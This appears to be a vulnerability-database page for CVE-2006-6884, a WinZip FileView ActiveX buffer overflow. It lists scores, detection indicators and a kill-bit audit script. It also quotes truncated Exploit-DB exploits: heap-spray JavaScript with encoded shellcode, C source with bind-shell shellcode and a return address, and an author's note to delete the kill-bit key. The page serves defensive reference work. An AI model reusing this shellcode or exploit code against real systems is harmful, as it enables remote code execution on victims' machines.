CVE-2006-6884
Published 2006-12-31
Priority: P2 (61) · Critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Tags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 4.49% (90.3th percentile)
Buffer overflow in the WZFILEVIEW.FileViewCtrl.61 ActiveX control (aka Sky Software "FileView" ActiveX control) for WinZip 10.0 Build 6667 allows remote attackers to execute arbitrary code via a long argument to the CreateNewFolderFromName method, a different vulnerability than CVE-2006-5198.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| winzip | winzip | — | — |
Detection & IOCs (extracted from sources)
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713-BA413F034904}
- The exploit triggers the vulnerability via the FilePattern property assignment inside the WZFILEVIEW_OnAfterItemAdd VBScript event handler, passing an oversized string to smash the stack.
- The exploit embeds shellcode inside a crafted BMP image file written to disk; the BMP header is followed by a large NOP sled (999999 bytes) and then the shellcode payload.
- The overflow payload uses 265 'A' bytes before the return address overwrite, followed by 1827 more 'A' bytes; this specific padding pattern can be used in memory forensics or crash analysis.
- The ActiveX CLSID {A09AE68F-B14D-43ED-B713-BA413F034904} (WZFILEVIEW.FileViewCtrl.61) should be blocked via kill-bit; its absence from the IE ActiveX Compatibility registry key indicates the control is enabled and exploitable.
- The return address 0x02DA3269 is specific to WinXP SP2 (English) with WinZip 10.0 build 6667 and IE 6.0.2900.2180; it will not work on other OS/build combinations.
- Microsoft had already disabled the ActiveX control via a kill-bit (Compatibility Flags=0x400) prior to this CVE being published; the kill-bit registry key must be absent for the exploit to function.
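The kill-bit check described in the bullets above, written out as an added PowerShell audit script (not from this page, the CVE sources, or the exploit authors). It reads the `Compatibility Flags` value under the CLSID key named on the page and tests bit 0x400; the Wow6432Node path is an assumption for 32-bit IE on 64-bit Windows, and the remediation function is left as an opt-in call.

```powershell
# Added example: audit (and optionally set) the IE ActiveX kill-bit for the
# WZFILEVIEW.FileViewCtrl.61 CLSID listed on this page. Run elevated to remediate.
$clsid   = '{A09AE68F-B14D-43ED-B713-BA413F034904}'
$KillBit = 0x400   # Compatibility Flags bit that blocks the control in IE
$paths   = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    # Assumption: 32-bit IE on 64-bit Windows consults the Wow6432Node hive
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)

function Test-KillBit {
    param([string]$Path)
    # Missing key or missing value means the control is NOT blocked
    if (-not (Test-Path $Path)) { return $false }
    $flags = (Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    return (($flags -band $KillBit) -eq $KillBit)
}

function Set-KillBit {
    [CmdletBinding(SupportsShouldProcess)]
    param([string]$Path)
    if ($PSCmdlet.ShouldProcess($Path, 'Set Compatibility Flags kill-bit 0x400')) {
        if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
        $current = (Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $current) { $current = 0 }
        # OR the kill-bit in so any other compatibility flags are preserved
        Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value ($current -bor $KillBit) -Type DWord
    }
}

foreach ($p in $paths) {
    if (Test-KillBit -Path $p) {
        Write-Output "OK      kill-bit set:     $p"
    } else {
        Write-Output "EXPOSED kill-bit missing: $p"
        # Uncomment to remediate; add -WhatIf to preview the registry change first.
        # Set-KillBit -Path $p
    }
}
```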
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | 4.0 | | MEDIUM | |
GHSA
GHSA-74v5-jm2f-x8j9: Buffer overflow in the WZFILEVIEW
ghsa_unreviewed · 2022-05-01 · CVSS 4.0 · MEDIUM · CWE-119
VulnCheck
winzip winzip Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck · 2006 · CVSS 4.0 · MEDIUM
Affected: winzip winzip
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://web.archive.org/web/20090323012515/http://securitylabs.websense.com/content/Alerts/3326.aspx; https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
WinZip 10.0 - FileView ActiveX Controls Remote Overflow
exploitdb · 2006-12-31
---
/*
---===[ winzip-exploit.html
XiaoHui : 76693223[at]163com
HomePage: www.nipc.org.cn
(c) 2006 All rights reserved.
note: Because of the prior vuln in FileView ActiveX Control, Microsoft has disabled this ActiveX Control.
To test this vuln, you can delete the key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713-BA413F034904}]
"Compatibility Flags"=dword:00000400
I have tested the exploit on Windows 2000+sp4(CN) and Windows xp+sp2(CN) and Winzip 10.0(6667); you can try other versions, good luck~
]===---
*/
var heapSprayToAddress = 0x0d0d0d0d;
var payLoadCode = unescape( "%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC
Exploit-DB
WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
exploitdb · 2006-11-15
---
/* WinZip
*
* - prdelka
*/
#include
#include
#include
#include
#include
#include
#include
#define NOPSIZE 999999
struct target {
char* name;
int retaddr;
};
struct shellcode {
char* name;
short port;
int host;
char* shellcode;
};
int targetno = 1;
struct target targets[] = {
{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
};
int shellno = 2;
struct shellcode shellcodes[] = {
{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
"\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
"\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
"\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
"\x93\x46\x2f\x90\xfd\x4a\x6a\x51
Exploit-DB
WinZip 10.0.7245 - FileView ActiveX Control Stack Overflow (PoC)
exploitdb · 2006-11-14
---
# milw0rm.com [2006-11-14]
No writeups or analysis indexed.
2006-12-31: Published · Exploited in the wild